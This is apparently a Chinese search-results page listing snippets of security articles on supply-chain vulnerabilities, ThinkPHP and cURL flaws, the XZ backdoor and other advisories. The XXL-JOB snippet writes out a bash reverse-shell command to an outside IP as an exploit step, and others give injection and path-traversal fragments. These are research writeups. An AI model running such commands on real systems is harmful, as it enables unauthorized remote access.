首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏小生观察室

    软件供应链漏洞挖掘

    image.png 视频内容 软件供应链漏洞挖掘 1080P超清版 微信公众号平台本身会对素材进行二次压缩,会导致画面出现不清晰等情况。

    79100发布于 2021-05-30
  • 来自专栏全栈程序员必看

    thinkphp5.0漏洞_thinkphp6漏洞

    PDO查询能阻止大多数传参攻击,而且框架要求的php版本是5.4;这就防止了php在5.3.6下有个PDO本地查询造成SQL注入的漏洞。 0x01 漏洞分析和利用场景 该漏洞形成最关键的一点是需要开启debug模式,而Tp官方最新的版本5.0.9默认依旧是开放着调试模式 下载最新版本的5.0.9完整版 本地按照官方给的文档安装成功后, Like 、not like 、in 、not in 0x02 案例分析 笔者这里下载了一套商城系统 ,这个框架也是很听话的用了官方的配置,debug模式开启 下图是可以触发该漏洞的一段代码 Ids ids[0’\]=1 笔者尝试着连接对方的数据库,可惜的是运气不好 0x04漏洞总结 Tp5.0框架采用PDO机制已经很安全了,只要不出现拼接字符的现象,至少在绑定参数查询的时候不会产生注入漏洞;也由此可见 0x05漏洞修复 对于这个$k 可以过滤掉所有的特殊字符,以防特殊字符的引入造成MYSQL的报错;当然最好的办法还是关闭掉debug模式,期待官方升级最新的版本把debug模式默认关闭掉。

    2.1K30编辑于 2022-10-02
  • 来自专栏火山信安实验室

    漏洞通报】DuckDB NPM包供应链投毒事件

    漏洞情况近期,火山信安实验室监测发现,,DuckDB的Node.js和Wasm软件包在NPM供应链攻击中被植入恶意软件,攻击者通过劫持开发者账户发布恶意版本,利用供应链投毒手段在包中嵌入加密货币窃取后门 此次事件被追踪为CVE-2025-59037,属于高危供应链安全漏洞。 0x01漏洞利用方式攻击者通过精心策划的钓鱼邮件诱导开发者点击恶意链接,成功窃取其NPM账户控制权后,在受控账户下发布含恶意代码的DuckDB Node.js和Wasm包版本;当用户安装或运行这些受感染的包时 package.json和package-lock.json文件,确认是否引用了受影响版本的DuckDB启用NPM账户的双因素认证(2FA),防止账户被劫持引入AI异常行为检测和交易地址白名单验证,提升对供应链攻击的实时响应能力来源自

    28610编辑于 2025-10-22
  • 来自专栏世荣的博客

    搭建漏洞环境-实战-6

    搭建XSS测试平台 XSS测试平台是测试XSS漏洞获取cookie并接受Web页面的平台,XSS可以做JS能做的所有事情,包括但不限于窃取cookie,后台增删改文章,利用XSS漏洞进行传播,修改网页代码

    52130编辑于 2022-03-18
  • 来自专栏FreeBuf

    通过 Realtek SDK 漏洞攻击一窥 IoT 供应链威胁

    根据 Unit 42 的监测,大多数月份利用单个漏洞的攻击不会超过攻击总量的 10%。 由于 CVE-2021-35394 漏洞影响来自 66 个不同厂商的近 190 种型号的设备,攻击者就利用该漏洞在全球范围内对智能设备进行大规模攻击。   漏洞概述  CVE-2021-35394 漏洞于 2021 年 8 月 16 日被公开披露,由于许多 IoT 设备厂商都使用 Realtek 芯片组,该远程命令执行漏洞是一个典型的供应链安全问题。 分析了所有的 Payload,出现频率最高的 URL 及其攻击源如下所示: URL 频度排名 结论 通过 CVE-2021-35394 的在野攻击情况可以看出,攻击者对供应链漏洞非常感兴趣。 由于普通用户非常难以识别和修复这些漏洞,造成影响面非常广。

    2K10编辑于 2023-02-24
  • 来自专栏OneMoreThink的专栏

    漏洞研究(6):XXL-JOB调度中心默认口令漏洞

    GLUE(Shell IDE) 6. 【编写EXP代码】 1. bash -i >& /dev/tcp/10.58.81.119/1234 0>&1 7. 保存 8. 源码备注 9. 保存 10. 执行一次 6. 保存 4.1.4 查看日志 1. 任务管理 2. 【选择对应执行器】 3. 【选择对应任务】 4. 操作 5. 查询日志 6. 【选择对应日志】 7. 操作 8. 此时使用默认口令登录,提示帐号或密码错误,说明漏洞修复成功。 5.2 代码中修改默认口令 使用32位小写md5值,替换掉默认口令。 source /usr/local/xxl-job-2.2.0/doc/db/tables_xxl_job.sql exit 新部署好XXL-JOB后,使用默认口令登录,提示帐号或密码错误,说明漏洞不存在

    2K01编辑于 2025-05-13
  • 来自专栏FreeBuf

    重大供应链威胁!这个 Java 开源框架存在严重漏洞

    专家表示,这种情况可能会对未打补丁的软件构成重大供应链威胁。 CISA已将CVE-2022-36537添加到其已知已开发漏洞(KEV)目录中,该漏洞影响ZK Java Web框架9.6.1、9.6.0.1、9.5.1.3、9.0.1.2和8.6.4.1版本。 当该公司在90天内没有回应时,研究人员在Twitter上公布了一些关于如何利用该漏洞的细节,Huntress的研究人员利用这些细节复制了该漏洞并完善了一个概念验证(PoC)漏洞。 他们推测,该漏洞有可能影响到比这更多的机器。 供应链面临风险 当Huntress对该漏洞进行分析时,没有证据表明存在主动利用的情况。 这对攻击者来说无疑是利好的,同时这可能给供应链带来重大风险。

    59410编辑于 2023-03-29
  • 来自专栏API安全

    6月API安全漏洞报告

    为了让大家的API更加安全,致力于守护数字世界每一次网络调用,小阑给大家整理了6月份的一些API安全漏洞报告,希望大家查漏补缺及时修复自己API可能出现的漏洞。 No.1 MinIO未授权信息泄露漏洞漏洞详情:MinIO是一个开源的对象存储服务,它提供了云存储功能,可用于存储和管理大量数据。 漏洞危害:未授权信息泄露漏洞指的是MinIO实例没有正确的访问控制设置,使得未经授权的用户能够访问和下载存储在MinIO中的敏感数据。 No.2 Joomla Rest API未授权访问漏洞漏洞详情:Joomla Rest API 未授权访问漏洞(CVE-2023-23752),是由于Joomla对Web服务端点的访问控制存在缺陷,鉴权存在错误 一篇由Security Boulevard提供的漏洞文章,涵盖了Argo CD部署平台中的三个独立的API漏洞漏洞危害:第一个漏洞(CVE-2023-22736)是一个允许绕过授权的严重漏洞

    1.2K10编辑于 2023-06-30
  • 来自专栏网络安全技术点滴分享

    PyPI安全审计深度解析:代码库漏洞供应链防护

    我们对PyPI的审计 - Trail of Bits博客William Woodruff 2023年11月14日 开源, 供应链, 生态系统安全, 审计本文与PyPI维护者联合发布;请在此阅读他们的公告 的权限处理第三方服务集成(GitHub密钥扫描、PyPA咨询数据库、AWS SNS邮件传递、外部对象存储)发现虽非高危但可能影响Warehouse可用性、完整性或托管分发版完整性的问题,包括一个可泄露私有账户信息的漏洞 GitHub webhook事件处理及容器构建调度逻辑容器镜像构建与编排密钥处理和日志过滤用户界面表单和路由逻辑发现可能影响cabotage及其构建容器可用性/完整性的问题,包括两个可绕过访问控制或日志过滤的漏洞

    28510编辑于 2025-08-21
  • 来自专栏公共互联网反网络钓鱼(APCN)

    ExifTool元数据解析漏洞机制与macOS供应链防御研究

    摘要随着数字取证、新闻调查及企业资产管理系统对自动化文件处理流程依赖度的加深,元数据解析库的安全性已成为软件供应链中的关键薄弱环节。 关键词:ExifTool;CVE-2026-3102;元数据注入;远程代码执行;macOS安全;供应链攻击1. 引言在当代网络安全格局中,攻击面的边界正以前所未有的速度扩张。 这一发现不仅打破了“图片文件绝对安全”的认知误区,更揭示了软件供应链中潜藏的深层风险。 攻击场景建模与实战利用分析3.1 自动化工作流中的隐蔽渗透CVE-2026-3102最具破坏力的应用场景并非针对个人用户的单次点击,而是针对企业级自动化工作流的供应链攻击。 结论与展望CVE-2026-3102漏洞的披露,再次敲响了软件供应链安全的警钟。它揭示了在高度自动化的数字工作流中,看似无害的基础设施组件(如ExifTool)可能成为攻击者突破防线的跳板。

    12910编辑于 2026-03-11
  • 来自专栏绿盟科技安全情报

    漏洞通告】微软6月安全更新多个产品高危漏洞通告

    版本: 1.0 1 漏洞概述 北京时间6月10日,微软发布6月安全更新补丁,修复了130个安全问题,涉及Microsoft Windows、Internet Explorer、Microsoft Edge 本月微软月度更新修复的漏洞中,严重程度为关键(Critical)的漏洞共有12个,重要(Important)漏洞有118个。 根据产品流行度和漏洞重要性筛选出此次更新中包含影响较大的漏洞,请相关用户重点进行关注: CVE-2020-1206(PoC已公开):Windows SMBv3 客户端/服务器信息泄漏漏洞 Microsoft 攻击者利用此漏洞可获取到敏感信息。 与SMBv3Ghost有关的内容可参考:https://mp.weixin.qq.com/s/q3dL6YI0K-cFLbNzySabHQ 官方通告链接: https://portal.msrc.microsoft.com

    1.4K20发布于 2020-06-15
  • 来自专栏网络安全技术点滴分享

    CVE-2024-3094:XZ Utils供应链后门漏洞深度剖析

    项目概述CVE-2024-3094是一个存在于XZ Utils数据压缩库中的关键供应链后门漏洞,CVSS v3.1评分为10.0(严重)。 该漏洞通过修改构建过程在liblzma库中植入了远程代码执行后门。 主要风险 未经授权的远程访问 → 完整系统被攻陷 功能特性根据提供的代码内容分析,该项目主要涉及以下安全分析功能:供应链攻击分析:详细解析恶意代码如何通过构建过程注入到开源项目中漏洞机制剖析 return 0;} 技术深度分析该漏洞展现了高度复杂的供应链攻击技术:长期潜伏:攻击者以受信任贡献者身份长期参与项目隐蔽植入:恶意代码仅存在于发布包而非源码仓库条件触发:后门仅在特定条件下激活,避免常规检测依赖链利用 :通过系统服务的间接依赖实现权限提升这个案例强调了开源供应链安全的重要性,以及需要多层防御策略来防止类似攻击。

    27800编辑于 2025-12-25
  • 来自专栏DevOps持续集成

    安全软件供应链6个交付管道安全最佳实践

    这些软件供应链组件中的任何一个弱点都可能是软件供应链攻击中使用的入口点或支点。当你考虑到我们的软件供应链已经变得很复杂时,2021 年软件供应链攻击增加了 51%也就不足为奇了。 从 SAST、DAST 和 SCA 到容器镜像和基础设施即代码 (IaC) 扫描,消除漏洞和错误配置已成为一个价值数十亿美元的行业。 交付管道和软件供应链安全 为了支持快速、迭代和高质量的部署,托管 VCS 和 CI/CD 管道已成为云原生组织的命脉。 在这篇文章中,我们将研究 VCS 和 CI/CD 管道中一些最常见的安全漏洞,这些漏洞可能会使供应链受到攻击。然后,我们将介绍安全专业人员可以实施以减轻供应链攻击的几个最佳实践。 再加上它们处于软件供应链的中心,这使得它们很容易成为黑客的目标。

    94730编辑于 2022-12-29
  • 来自专栏安恒信息

    解读 | 6个问题深度解读CPU漏洞

    近日,谷歌Project Zero安全团队公布了两组CPU特性漏洞,分别命名为Meltdown和Spectre,安恒信息应急响应中心于日前已关注此漏洞并发布漏洞预警。 问 此次漏洞的危害是什么? 本次漏洞影响范围非常广泛,几乎所有的个人电脑、独立式服务器、云计算务器、各类智能手机、IoT设备、其他智能终端设备等都受到影响。 问 这次漏洞的CPU厂商影响范围有哪些? 此次漏洞虽然属于硬件层面漏洞,但是仅通过CPU厂商进行修复无法完全解决,需要各操作系统厂商、虚拟化厂商、软硬件分销商、浏览器厂商协作才能彻底修复漏洞。 虽然漏洞影响极为广泛,但对于普通网民不必过于恐慌。对于普通网民来说,需要用存在漏洞的浏览器带有漏洞利用代码的恶意网站才可导致用户的个人隐私的泄漏。

    1.4K90发布于 2018-04-10
  • 来自专栏FreeBuf

    TensorFlow机器学习框架曝严重漏洞,黑客可发起供应链攻击

    在开源TensorFlow机器学习框架中发现的持续集成与持续交付(CI/CD)配置错误,可能被利用来发起供应链攻击。 Khan和John Stawinski在本周发布的一份报告中表示,这些配置错误可能被攻击者利用来“通过恶意拉取请求(pull request),在GitHub和PyPi上对TensorFlow版本实施供应链妥协 通过利用这些漏洞,攻击者可将恶意版本上传到GitHub仓库,并获得自托管GitHub运行器(runner)上的远程代码执行权限,甚至检索tensorflow-jenkins用户的GitHub个人访问令牌

    59710编辑于 2024-01-20
  • 来自专栏DevOps

    制品可信 + 漏洞动态阻断,嘉为蓝鲸 CPack 护航软件供应链

    官网原文(免费申请演示):CPack制品库:制品黑白名单,为软件供应链安全护航01.背景企业级应用中 90% 以上依赖开源组件,但开源生态存在漏洞、后门及协议风险;同时,在金融、电信等行业,需要遵从合规条例和安全法规 所以,在 DevOps 制品仓库管理平台中,制品黑白名单和漏洞黑白名单是保障软件供应链安全、控制风险的核心功能。

    11900编辑于 2025-07-07
  • 来自专栏极安御信安全研究院

    漏洞分析丨HEVD-0x6.UninitializedStackVariable

    作者selph前言窥探Ring0漏洞世界:未初始化栈变量漏洞上一篇探讨了空指针解引用漏洞的利用,这里来探讨另一种漏洞,未初始化栈变量漏洞,未初始化变量本身是没啥事的,但如果这个变量结构里存储了会拿出来执行的东西 (回调函数啥的),那就是另一回事了实验环境:•虚拟机:Windows 7 x86•物理机:Windows 10 x64•软件:IDA,Windbg,VS2022漏洞分析老样子,先IDA找到该漏洞的触发函数 漏洞利用​那么问题来了,要如何去控制回调地址呢? "pause");   system("cmd.exe");   return 0;}截图演示图片参考资料•[1] Windows Kernel Exploitation Tutorial Part 6: [05] HEVD 内核漏洞之未初始化栈变量 | Saturn35 https://saturn35.com/2019/07/26/20190726-2/•[6] C library function

    50920编辑于 2022-07-21
  • 来自专栏网站漏洞修补

    Thinkphp-v6版本漏洞复现

    使用thinkphp并开启多语言的网站漏洞指纹如下:header="think_lang"漏洞影响版本范围v6.0.0<=ThinkPHP<=v6.0.13v5.0.0<=ThinkPHP<=5.0.12v5.1.0 这个漏洞利用的前提,必须要thinkphp开启多语言这一功能,像一些外贸公司网站,一些企业网站,想使用多语言的网站都是可以利用该漏洞进行远程代码执行漏洞的。 具体的GET漏洞利用数据包如下:GET/index.php?s=index/index/index/think_lang/../.. 我们SINE安全建议广大站长以及网站运营者,尽快的升级thinkphp到最高版本,目前Thinkphp官方在最新版本中修复了这个漏洞,也可以对该pearcmd文件进行强制删除,待代码漏洞修复后,还原该pearcmd 文件,也可以找专业的网站安全公司进行代码漏洞修复和整体的网站安全加固。

    3.4K40编辑于 2022-12-12
  • 来自专栏FreeBuf

    不被PayPal待见的6个安全漏洞

    最近,Cybernews分析人员称,他们发现了和PayPal相关的6个高危漏洞,攻击者利用这些漏洞可以实现:绕过PayPal登录后的双因素认证(2FA)、使用其内部智能聊天系统发送恶意代码。 然而就在上报了这些漏洞后,Cybernews遇到了无休止拖延、无人回应、含糊响应和不被重视的情形。以下是Cybernews就发现的6漏洞进行的说明,抛开是非对错,我们只来围观其技术姿势就好。 认证漏洞漏洞6:安全问题输入中存在持久型XSS 该漏洞漏洞5类似,原因在于PayPal未对安全问题的用户输入答案实施过滤,导致存在XSS,我们可以使用MITM代理对其抓包构造,实现XSS触发。 PayPal对该漏洞的回应称已有其他安全人员提交过该漏洞,而就在同一天,PayPal对该漏洞进行了修复。

    4K30发布于 2020-03-24
  • 来自专栏OpenSCA

    供应链安全情报 | cURL最新远程堆溢出漏洞复现与修复建议

    cURL在2023年10月11日下午紧急发布最新版本来修复前几日发现的高危安全漏洞,其中编号为CVE-2023-38545的漏洞是cURL客户端在处理SOCKS5协议时存在的堆内存溢出漏洞。 图片漏洞复现悬镜供应链安全实验室第一时间对该漏洞进行分析和复现,当使用存在CVE-2023-38545漏洞的curl客户端或libcurl库请求攻击者的恶意socks代理服务器时,攻击者可通过socks5 服务器返回非法的协议数据来远程触发该堆内存溢出漏洞,如果能成功利用该漏洞,受害者主机系统可能存在被攻击者远程执行任意代码的风险。 漏洞补丁cURL项目官方发布了CVE-2023-38545的漏洞补丁如下https://github.com/curl/curl/commit/fb4415d8aee6c1图片在修复补丁中,当cURL客户端发现 图片修复建议禁止使用存在漏洞版本的curl客户端或libcurl库连接不信任的socks代理服务器升级到最新版本8.4.0*ps:可以关注下容器中 cURL 的默认版本该漏洞利用难度较高,用户可酌情选择是否升级到最新版本悬镜供应链安全实验室也将持续监测和挖掘未知的开源组件安全风险

    2.4K220编辑于 2023-10-12
领券